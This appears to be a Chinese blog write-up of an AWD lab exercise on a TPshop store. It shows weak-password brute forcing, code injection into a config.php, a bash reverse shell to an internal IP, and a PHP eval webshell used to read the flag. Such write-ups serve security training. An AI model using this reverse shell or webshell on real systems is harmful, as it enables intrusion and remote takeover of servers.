AWD靶场TPshop后台获取shell

开局一个商城页面,具体内容全靠蒙

常规套路直接访问后台页面

经过爆破,存在弱口令,账户admin 密码123456

找了半天也没找到上传点,然后进行本地的代码审计

发现在物流信息的config.php暗藏玄机

这个desc就是简介内容,尝试写入POST参数

提交成功

进行代码审计的时候发现这个拥有目录泄露。。。

可以直接访问目录位置

访问新建的目录内的config尝试post传参

五秒后返回相应,说明成功

尝试传参shell

我方维护机内输入nc -lvvp 端口

传参要指定在内网ip(有vps就用vps)一样

参数构筑(要使用url编码):

bash -c "bash -i >& /dev/tcp/172.17.0.4/8858 0>&1"

发送后直接反弹shell

touch 1.php
echo  '<?php @eval($_POST['cmd']) ?>' > 1.php //对1.php写入一句话木马

菜刀直接访问

链接成功

打开终端cat flag即可

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享
评论 抢沙发